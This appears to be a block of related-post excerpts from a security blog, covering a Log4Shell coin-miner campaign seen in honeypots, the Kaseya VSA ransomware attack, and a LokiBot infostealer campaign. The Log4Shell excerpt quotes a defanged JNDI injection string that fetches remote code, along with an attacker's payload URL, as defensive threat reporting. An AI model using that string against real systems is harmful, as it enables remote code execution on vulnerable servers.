You might be interested in …

[SANS ISC] Log4Shell exploited to implant coin miners, (Mon, Dec 13th)


Analyzing the ISC honeypots’ requests, I found out that coin miners just included Log4Shell into their arsenal.  The request that hit our honeypot is trying to make vulnerable log4j load the address ‘jndi:ldap://45[.]83.193.150:1389/Exploit’. This will make log4j load and instantiate a malicious payload hosted at ‘http://31[.]220.58.29/Exploit.class’. I could find the payload address by doing a […]


[SANS ISC] Kaseya VSA Users Hit by Ransomware, (Fri, Jul 2nd)


We are aware that some MSSP’s customers (Managed Security Services Providers) have been hit by a ransomware. It seems that four(4) MSSP’s have been affected until now. The ransomware was spread through the remote management solution “VSA”  provided by Kaseya[1]. This looks to be a brand new type of supply chain attack. What we know so far? […]


Daily NCSC-FI news followup 2019-09-09

Newly Discovered Infostealer Attack Uses LokiBot www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot.html The FortiGuard Labs SE team identified a new malicious spam campaign on August 21st, which we discovered after an analysis of information initially found on VirusTotal. It targeted a large US manufacturing company utilizing the well documented infostealer LokiBot. Interestingly enough, this also has a compilation date of […]

